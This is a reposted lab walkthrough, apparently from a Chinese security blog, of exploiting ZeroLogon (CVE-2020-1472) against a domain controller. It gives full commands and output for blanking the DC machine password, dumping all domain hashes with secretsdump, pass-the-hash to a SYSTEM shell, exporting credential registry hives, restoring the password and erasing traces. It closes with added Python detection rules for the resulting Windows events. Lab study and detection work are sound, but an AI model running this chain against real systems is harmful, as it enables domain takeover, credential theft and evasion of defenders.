Article summary: This document records the full penetration-testing workflow for the ZeroLogon vulnerability CVE-2020-1472, covering reconnaissance, exploitation, hash dumping, pass-the-hash to obtain domain controller privileges, and password recovery. After the MSF module sets the domain controller's machine account password to empty, the domain hashes are dumped with Impacket and a SYSTEM shell is obtained. The article stresses the importance of restoring the original password and gives a detailed recovery method to avoid business disruption; overall it is a complete, actionable hands-on tutorial. Overall score: 86. Categories: penetration testing, internal network penetration, vulnerability PoC, hands-on experience, vulnerability analysis
ZeroLogon (CVE-2020-1472)
web安全小白
March 10, 2026, 09:00, Guizhou
Disclaimer
Any direct or indirect consequences and losses arising from the dissemination or use of the information provided by this public account are the sole responsibility of the user; the account and its author accept no liability. If you believe any content infringes your rights, please let me know and I will remove it immediately and apologize. Thank you!
📋 Environment
Hands-on record: from reconnaissance to full control of the domain controller
Lab range (ZeroLogon exercise): https://vip.mhtsec.com/ulab/
| Item | Value |
| --- | --- |
| Target DC IP | 192.168.111.100 |
| Target NetBIOS name | MASTERPC |
| Domain | MYD |
| Attacker IP | 192.168.111.25 |
| Administrator hash | ec0df45863a3751d56ba6df1e72f7218 |
Phase 1: Reconnaissance
1.1 Start msfconsole
```
kali@kali:~$ msfconsole -q
msf6 >
```
1.2 Scan the target's NetBIOS information
```
msf6 > use auxiliary/scanner/netbios/nbname
msf6 auxiliary(scanner/netbios/nbname) > set RHOSTS 192.168.111.100
RHOSTS => 192.168.111.100
msf6 auxiliary(scanner/netbios/nbname) > run

[*] Sending NetBIOS requests to 192.168.111.100->192.168.111.100 (1 hosts)
[+] 192.168.111.100 [MASTERPC] OS:Windows Names:(MASTERPC, MYD) Addresses:(192.168.111.100) Mac:00:50:56:b1:89:24 Virtual Machine:VMWare
```
Key information: NetBIOS name = MASTERPC, domain = MYD
Phase 2: ZeroLogon exploitation
2.1 Switch to the ZeroLogon module
```
msf6 auxiliary(scanner/netbios/nbname) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
```
2.2 Set the parameters and run the attack
```
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.111.100
RHOSTS => 192.168.111.100
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME MASTERPC
NBNAME => MASTERPC
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION CHECK
ACTION => CHECK
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run

[*] Running module against 192.168.111.100
[*] 192.168.111.100: - Connecting to the endpoint mapper service...
[*] 192.168.111.100: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.111.100[49667] ...
[*] 192.168.111.100: - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.111.100[49667] ...
[+] 192.168.111.100: - Successfully authenticated
[+] 192.168.111.100: - Successfully set the machine account (MASTERPC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
```
Success! The domain controller's machine account password has been set to empty.
Phase 3: Dump all domain user hashes
3.1 Dump the hashes with Impacket in a new Kali terminal
```
kali@kali:~$ impacket-secretsdump -just-dc-ntlm MYD/MASTERPC\$@192.168.111.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8b5f7a5e4b9f3a2c1d8e7f6a5b4c3d2e:::
MYD\user1:1103:aad3b435b51404eeaad3b435b51404ee:7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d:::
...
[*] Cleaning up...
```
3.2 Save the hashes to a file
```
kali@kali:~$ impacket-secretsdump -just-dc-ntlm MYD/MASTERPC\$@192.168.111.100 > hashes.txt
kali@kali:~$ grep Administrator hashes.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::
```
Record the Administrator NTLM hash: ec0df45863a3751d56ba6df1e72f7218
Phase 4: Pass-the-hash to log in to the domain controller
4.1 Get a SYSTEM shell with psexec
```
kali@kali:~$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218 MYD/Administrator@192.168.111.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 192.168.111.100.....
[*] Found writable share ADMIN$
[*] Uploading file yQyVzZhe.exe
[*] Opening SVCManager on 192.168.111.100.....
[*] Creating service QfGB on 192.168.111.100.....
[*] Starting service QfGB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```
Success! We now have a SYSTEM shell on the domain controller.
4.2 Verify privileges
```
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
MASTERPC

C:\Windows\system32> ipconfig
Windows IP Configuration

Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix . :
   IPv4 Address. . . . . . . . . . . : 192.168.111.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.111.1
```
Phase 5: Find the flag
5.1 Look for the flag on the desktop
```
C:\Windows\system32> cd C:\
C:\> dir
 Volume in drive C has no label.
 Volume Serial Number is XXXX-XXXX

 Directory of C:\

01/15/2026  10:30 AM    <DIR>          .
01/15/2026  10:30 AM    <DIR>          ..
01/15/2026  10:30 AM                24 flag.txt
               1 File(s)             24 bytes
               2 Dir(s)  XX,XXX,XXX,XXX bytes free
```
5.2 Read the flag (handling encoding problems)
```
C:\> type flag.txt
FLAG{ZeroLog0n_Exp10it_Success_websec}
```
Or, if the output is garbled:
```
C:\Users\Administrator\Desktop> chcp 437
Active code page: 437

C:\Users\Administrator\Desktop> type flag.txt
FLAG{ZeroLog0n_Exp10it_Success_websec}
```
Phase 6: Restore the domain controller's original password (critical! avoids business disruption)
6.1 Export the registry hives from the Windows shell
```
C:\Windows\system32> cd C:\temp
C:\temp> reg save HKLM\SYSTEM system.save
The operation completed successfully.

C:\temp> reg save HKLM\SAM sam.save
The operation completed successfully.

C:\temp> reg save HKLM\SECURITY security.save
The operation completed successfully.

C:\temp> dir *.save
 Volume in drive C has no label.
 Volume Serial Number is XXXX-XXXX

 Directory of C:\temp

03/10/2026  02:30 PM            28,672 system.save
03/10/2026  02:30 PM            24,576 sam.save
03/10/2026  02:30 PM            32,768 security.save
               3 File(s)         86,016 bytes
```
6.2 Start an HTTP server on Windows (new terminal)
```
C:\temp> python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 ...
```
If Windows has no Python, a .NET HttpListener works instead. The first command opens port 8000 in the firewall; the second serves whichever .save file the request names from C:\temp and answers 404 for anything else (a listener that always returns system.save would hand wget the wrong contents for sam.save and security.save):
```
C:\temp> powershell -Command "New-NetFirewallRule -DisplayName 'HTTP-8000' -Direction Inbound -Protocol TCP -LocalPort 8000 -Action Allow"
C:\temp> powershell -Command "$listener = New-Object System.Net.HttpListener; $listener.Prefixes.Add('http://*:8000/'); $listener.Start(); Write-Host 'Listening on port 8000...'; while ($listener.IsListening) { $context = $listener.GetContext(); $response = $context.Response; $name = [System.IO.Path]::GetFileName($context.Request.Url.LocalPath); if ($name -like '*.save' -and (Test-Path $name)) { $file = [System.IO.File]::ReadAllBytes($name); $response.OutputStream.Write($file, 0, $file.Length) } else { $response.StatusCode = 404 }; $response.Close() }"
```
6.3 Download the files on Kali
```
# Download the files
kali@kali:~$ wget http://192.168.111.100:8000/system.save
kali@kali:~$ wget http://192.168.111.100:8000/sam.save
kali@kali:~$ wget http://192.168.111.100:8000/security.save

# Or with curl
kali@kali:~$ curl -O http://192.168.111.100:8000/system.save

# Verify the download
kali@kali:~$ ls -la *.save
-rwxrwxrwx 1 root root 335 Mar 10 01:15 sam.save
-rwxrwxrwx 1 root root 335 Mar 10 01:15 security.save
-rwxrwxrwx 1 root root 335 Mar 10 01:11 system.save
```
Then, on Windows, delete the exported hives:
```
C:\temp> del *.save
```
6.4 Extract the original machine account hash on Kali
```
# Press Ctrl+C in the HTTP server window to stop it, then run:
kali@kali:~$ impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x1234567890abcdef1234567890abcdef
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
MASTERPC$:1000:aad3b435b51404eeaad3b435b51404ee:7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c:::
[*] Cleaning up...
```
Record the original NTLM hash of MASTERPC$: 7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c
6.5 Return to msfconsole and restore the password
```
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.111.100
RHOSTS => 192.168.111.100
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME MASTERPC
NBNAME => MASTERPC
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTORE
ACTION => RESTORE
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c
PASSWORD => 7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run

[*] Running module against 192.168.111.100
[+] 192.168.111.100: - Machine account password restored successfully
```
6.6 Verify that the password is restored
```
kali@kali:~$ impacket-secretsdump -just-dc-ntlm MYD/MASTERPC\$@192.168.111.100
[-] SMB SessionError: STATUS_LOGON_FAILURE
```
The logon failure shows the password has been restored: the empty password no longer works, so the restore succeeded.
Phase 7: Clean up traces (optional)
7.1 Delete the uploaded tool from the Windows shell (the binary psexec uploaded to ADMIN$ is the one named in its output; a wildcard such as C:\Windows\*.exe would also delete Windows' own executables)
```
C:\Windows\system32> del C:\Windows\yQyVzZhe.exe /q
```
7.2 Delete the created service
```
C:\Windows\system32> sc delete QfGB
[SC] DeleteService SUCCESS
```
7.3 Exit the shell
```
C:\Windows\system32> exit
```
📊 Attack flow summary
| Phase | Step | Key command | Result |
| --- | --- | --- | --- |
| 1 | Reconnaissance | nbname scan | NetBIOS name MASTERPC obtained |
| 2 | ZeroLogon exploitation | cve_2020_1472_zerologon | DC machine account password set to empty |
| 3 | Hash dump | secretsdump | Administrator hash obtained |
| 4 | Pass-the-hash | psexec | SYSTEM shell obtained |
| 5 | Get the flag | type flag.txt | FLAG{ZeroLog0n_Exp10it_Success_2026} |
| 6 | Restore password | registry export + RESTORE | Service back to normal |
| 7 | Clean up traces | delete files and service | Lower chance of discovery |
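Every phase in the table above leaves records on the domain controller that a defender can alert on. The block below is an added example, written for this page and not code from the original post, Metasploit or Impacket. It runs simple detection rules over constructed sample event records (one flat dict per event, with keys named after the Windows event data fields) for the machine-account reset of phase 2 (Security 4742, plus the Netlogon 5827 to 5829 events that the CVE-2020-1472 fix introduced), the DRSUAPI dump of phase 3 (Security 4662 correlated with the 4624 logon by logon ID, because after ZeroLogon the replicating account is the DC's own and the classic "non-DC account" rule would miss it), the psexec service install of phase 4 (System 7045) and the hive export of phase 6 (Security 4688 with command-line auditing). The sample records, the logon IDs and the service-name and image-path heuristics for psexec are assumptions modelled on the output shown in this walkthrough; the RESTORE step of phase 6 changes the same account again and is expected to leave a second 4742.

```python
"""Detection rules for the DC-side records left by this walkthrough.
Added example, not code from the original post; event records are constructed
samples (one flat dict per event, keys named after the Windows event data
fields), not real exports."""
import re

# Extended-right GUIDs requested by secretsdump's DRSUAPI method
# (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All).
REPLICATION_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}
# Netlogon event IDs introduced with the CVE-2020-1472 fix: 5827/5828 record a
# denied vulnerable secure-channel connection, 5829 one that was still allowed.
NETLOGON_VULN_CHANNEL_IDS = {5827, 5828, 5829}
# Legitimate domain controllers, from the environment table above.
DC_ACCOUNTS = {"MASTERPC$"}
DC_IPS = {"192.168.111.100"}
# Heuristics for the other phases (assumed patterns, modelled on the output shown
# in this walkthrough: "Creating service QfGB", "Uploading file yQyVzZhe.exe",
# "reg save HKLM\SAM sam.save").
PSEXEC_SVC_RE = re.compile(r"^[A-Za-z]{4}$")
PSEXEC_IMAGE_RE = re.compile(r"^%systemroot%\\[A-Za-z]{8}\.exe$", re.IGNORECASE)
HIVE_SAVE_RE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b", re.I)
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def build_logon_map(events):
    """LogonId -> source IP from 4624 records; 4662 carries no IP of its own."""
    return {e["TargetLogonId"]: e.get("IpAddress", "-")
            for e in events if e.get("EventID") == 4624}


def detect_one(e, logon_ip):
    """Apply the rule for one event; returns a list of finding strings."""
    eid = e.get("EventID")
    if eid == 4742:
        # Phase 2 (and the RESTORE in phase 6): the forged Netlogon credential
        # shows up as a DC computer-account change by ANONYMOUS LOGON.  Routine
        # rotations have the computer account itself as the subject.
        if e.get("TargetUserName") in DC_ACCOUNTS and e.get("SubjectUserName") == "ANONYMOUS LOGON":
            return [f"4742: DC account {e['TargetUserName']} password reset by ANONYMOUS LOGON (ZeroLogon pattern)"]
    elif eid in NETLOGON_VULN_CHANNEL_IDS:
        return [f"{eid}: Netlogon reported a vulnerable secure-channel connection on {e.get('Computer', '?')}"]
    elif eid == 4662:
        # Phase 3: a non-DC account asking for replication rights is the classic
        # DCSync alert; after ZeroLogon the subject IS the DC's own account, so
        # the logon's source address is what gives it away.
        if set(GUID_RE.findall(e.get("Properties", "").lower())) & REPLICATION_GUIDS:
            subj = e.get("SubjectUserName", "")
            src = logon_ip.get(e.get("SubjectLogonId"), "unknown")
            if subj not in DC_ACCOUNTS:
                return [f"4662: replication requested by non-DC account {subj} from {src}"]
            if src not in DC_IPS:
                return [f"4662: DC account {subj} replicating from non-DC address {src}"]
    elif eid == 7045:
        # Phase 4: psexec installs a random-named service whose binary it dropped in ADMIN$.
        if PSEXEC_SVC_RE.match(e.get("ServiceName", "")) and PSEXEC_IMAGE_RE.match(e.get("ImagePath", "")):
            return [f"7045: psexec-style service {e['ServiceName']} -> {e['ImagePath']}"]
    elif eid == 4688:
        # Phase 6: hive export (needs "include command line" process auditing).
        if HIVE_SAVE_RE.search(e.get("CommandLine", "")):
            return [f"4688: registry hive export by {e.get('SubjectUserName', '?')}: {e['CommandLine']}"]
    return []


def detect(events):
    """Run every rule over a list of events; findings come back in event order."""
    logon_ip = build_logon_map(events)
    return [f for e in events for f in detect_one(e, logon_ip)]


# Constructed sample events modelled on the walkthrough (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4742, "Computer": "MASTERPC", "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "MASTERPC$"},
    {"EventID": 5829, "Computer": "MASTERPC"},
    {"EventID": 4624, "TargetUserName": "MASTERPC$", "TargetLogonId": "0x3e7a12", "IpAddress": "192.168.111.25"},
    {"EventID": 4662, "SubjectUserName": "MASTERPC$", "SubjectLogonId": "0x3e7a12",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 7045, "ServiceName": "QfGB", "ImagePath": "%SystemRoot%\\yQyVzZhe.exe"},
    {"EventID": 4688, "SubjectUserName": "MASTERPC$", "CommandLine": "reg save HKLM\\SAM sam.save"},
    # Benign records that must stay quiet: scheduled rotation, DC-to-DC replication, a normal service.
    {"EventID": 4742, "Computer": "MASTERPC", "SubjectUserName": "MASTERPC$", "TargetUserName": "MASTERPC$"},
    {"EventID": 4624, "TargetUserName": "MASTERPC$", "TargetLogonId": "0x4f1c", "IpAddress": "192.168.111.100"},
    {"EventID": 4662, "SubjectUserName": "MASTERPC$", "SubjectLogonId": "0x4f1c",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it prints one line per phase for the five attack records and nothing for the benign ones. The 4624-to-4662 join is the part worth keeping in a real pipeline: without it, a DC's own account replicating looks exactly like normal inter-DC traffic, which is why a ZeroLogon-driven secretsdump slips past rules that only look at the account name.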
Disclaimer:
The programs and techniques in this article are intended solely for lawful security research and teaching, with the aim of improving network security defences, and are of a clearly technical research nature.
Any organisation or individual that uses this content without authorisation for attacks, sabotage or other illegal purposes bears all resulting legal liability, civil compensation and joint liability alone; this site accepts no joint liability.
Content on this site is published for technical exchange and knowledge sharing; for copyright complaints or other objections, please contact us by e-mail via the contact link at the top of the page.
Reposted from: web安全小白, "ZeroLogon (CVE-2020-1472)"
Copyright notice
This site only archives this content, for research and teaching reference.
Readers who use the information for other purposes bear all legal and joint liability themselves; this site accepts no responsibility.